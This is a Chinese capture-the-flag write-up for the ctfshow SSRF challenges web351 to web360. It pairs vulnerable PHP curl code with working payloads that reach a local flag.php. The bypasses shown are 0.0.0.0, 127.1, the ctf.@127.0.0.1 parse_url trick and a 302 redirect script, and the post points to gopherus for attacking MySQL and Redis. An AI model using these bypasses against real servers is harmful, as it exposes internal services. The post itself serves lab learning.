ctfshow (ssrf学习和实践)
web351
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$ch=curl_init($url);//初始化一个cURL会话
curl_setopt($ch, CURLOPT_HEADER, 0);//curl_setopt函数的作用是为一个CURL会话设置选项
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);//执行一个cURL会话
curl_close($ch);//关闭一个cURL会话并且释放所有资源。
echo ($result);
?>
第一道题多说几句,在curl_init()函数中传参和在curl_setopt()函数中设置CURLOPT_URL,效果是一样的都是取回一个url地址。
这里尝试发现需要以本地用户访问:
payload:url=http://127.0.0.1/flag.php
web352
这里url的scheme必须为http或者https,并且不能有localhost和127.0.0.这里多说一下。php的parse_url()函数可以解析url:
<?php
$url="http://www.aaaaa.com/aaa";
$parse=parse_url($url);
print_r($parse);
/***显示*Array
(
[scheme] => http
[host] => www.aaaaa.com
[path] => /aaa
)*/
可以用0.0.0.0绕过:
url=http://0.0.0.0/flag.php
web353
和web252一样
web354
这里可以利用302跳转,在自己的vps上搭一个:
<?php
header("Location: http://127.0.0.1/flag.php");
payload:url=http://xxxxxx/xx.php
当然y4师傅找到了一个http://sudo.cc/
可以直接使用
web355
这道题需要host小于5,可以使用的包括省略0,或者只有0都行,因为0在linux系统中会解析成127.0.0.1在windows中解析成0.0.0.0
url=http://127.1/flag.php```
url=http://0/flag.php
web356
同上
web357
这里需要用到302跳转,在354中已经提到了,那么为什么这里要进行302跳转呢?
因为这个:
filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)
具体的使用方法参考:地址
web358
正则表达试的意思就是url以ctf开头以show结尾
<?php
$url="http://ctf.@127.0.0.1/flag.php?show";
$parse=parse_url($url);
print_r($parse);
/***显示* Array
(
[scheme] => http
[host] => 127.0.0.1
[user] => ctf.
[path] => /flag.php
[query] => show
)*/
web359/web360
这两道题都需要使用到gopherus工具地址:地址
web359打MySQL:
web360打redis:
需要注意的是这里的payload在下划线之后都需再次进行url编码。
ctfshow (ssrf学习和实践)相关推荐
- 八大深度学习最佳实践
翻译 | AI科技大本营 参与 | 刘畅 [AI 科技大本营导读] 2017年,许多的人工智能算法得到了实践和应用.名博Hack Noon作者 Brian Muhia 认为想要玩转人工智能,不仅要拥有 ...
- 深度学习算法实践(基于Theano和TensorFlow)
深度学习算法实践(基于Theano和TensorFlow) 闫涛 周琦 著 ISBN:9787121337932 包装:平装 开本:16开 用纸:胶版纸 正文语种:中文 出版社:电子工业出版社 出版时 ...
- 【PWA学习与实践】(3) 让你的WebApp离线可用
<PWA学习与实践>系列文章已整理至gitbook - PWA学习手册,文字内容已同步至learning-pwa-ebook.转载请注明作者与出处. 本文是<PWA学习与实践> ...
- Google App Engine 学习和实践
这个周末玩了玩Google App Engine,随手写点东西,算是学习笔记吧.不当之处,请多多指正. 作者:liigo,2009/04/26夜,大连 原创链接:http://blog.csdn.ne ...
- 人工神经网络理论、设计及应用_TensorFlow深度学习应用实践:教你如何掌握深度学习模型及应用...
前言 通过TensorFlow图像处理,全面掌握深度学习模型及应用. 全面深入讲解反馈神经网络和卷积神经网络理论体系. 结合深度学习实际案例的实现,掌握TensorFlow程序设计方法和技巧. 着重深 ...
- 深度学习笔记第二门课 改善深层神经网络 第一周:深度学习的实践层面
本文是吴恩达老师的深度学习课程[1]笔记部分. 作者:黄海广[2] 主要编写人员:黄海广.林兴木(第四所有底稿,第五课第一二周,第三周前三节).祝彦森:(第三课所有底稿).贺志尧(第五课第三周底稿). ...
- .NET Core 微服务学习与实践系列文章目录索引(2019版)
Photo :.NET Core 文 | Edison Zhou 2018年,我开始学习和实践.NET Core,并开始了微服务的学习,以及通过各种开源组件搭建服务治理技术方案,并在学习过程中总结了一 ...
- .NET Core on K8S 学习与实践系列文章索引 (更新至20191126)
更新记录: -- 2019-11-26 增加Docker容器日志系列文章 近期在学习Kubernetes,基于之前做笔记的习惯,已经写了一部分文章,因此给自己立一个flag:完成这个<.NET ...
- .NET Core on K8S 学习与实践系列文章索引 (更新至20191116)
更新记录: -- 2019-11-16 增加Docker容器监控系列文章 // 此外,今天是11月17日,我又老了一岁,祝我自己生日快乐! 近期在学习Kubernetes,基于之前做笔记的习惯,已经写 ...
- 2.1)深度学习笔记:深度学习的实践层面
目录 1)Train/Dev/Test sets 2)Bias/Variance 3)Regularization(重点) 4)Why regularization reduces overfitti ...
最新文章
- Pytorch和Tensorflow,谁会笑到最后?
- 0102 项目经理的精神病(二)完美
- Shiro缓存使用Redis、Ehcache、自带的MpCache实现的三种方式实例
- 浏览器如何生成URL
- [html] 打印页面时怎样自定义打印页眉页脚或者去掉眉页脚?
- mysql查询流程解析及重要知识总结
- 并发数据结构- 1.1.1 性能
- python与冒泡排序
- 新手该怎么独立做跨境电商?做之前需要准备什么?
- 【原】jQuery easyUI 快速搭建前端框架
- 第十届中软杯(A2行人追踪)!!!
- 怎么查看计算机硬盘sn,硬盘序列号,教您怎么查看硬盘序列号
- java 字符串限制长度吗_[Java教程]限制字符串长度
- 2022百度大数据开发工程师实习面试经历
- iOS 日记app的制作过程(Objective-C)
- 2022-6-25 12点 程序爱生活 恒指选择继续向上震荡,而且等来了推动前期上涨原因的一个消息:港股的ETF通过港股通可以交易
- 2021个人开通抖音小店条件,抖音蓝v有什么好与弊
- 【web前端特效源码】使用HTML5+CSS3+JavaScript制作一个复古手机键盘(带声音)的动画效果~~适合初学者~超简单~
- 如何在Word中的表上添加边框或更改边框
- 数据结构例16.试设计一个算法, 使得在一个有序的单链表中插入一个元素后仍然有序。
热门文章
- 【工作规划】未来自我学习计划及发展注意事项
- 100个python算法超详细讲解:三色旗
- 解析力 (1 )MTF SFR
- Google大数据论文GFS(Google File System)介绍
- 分享一个去广告的浏览器插件
- 长治南垂驾校科目二经验总结
- frp穿透你的远程桌面
- Kruise Rollout v0.2.0 版本发布:支持 Gateway API、StatefulSet 分批发布等能力
- 外星人笔记本计算机在哪里,笔记本电脑没声音,详细教您外星人笔记本没声音如何解决...
- 初中OJ1998【2015.8.3普及组模拟赛】饥饿的WZK(hunger)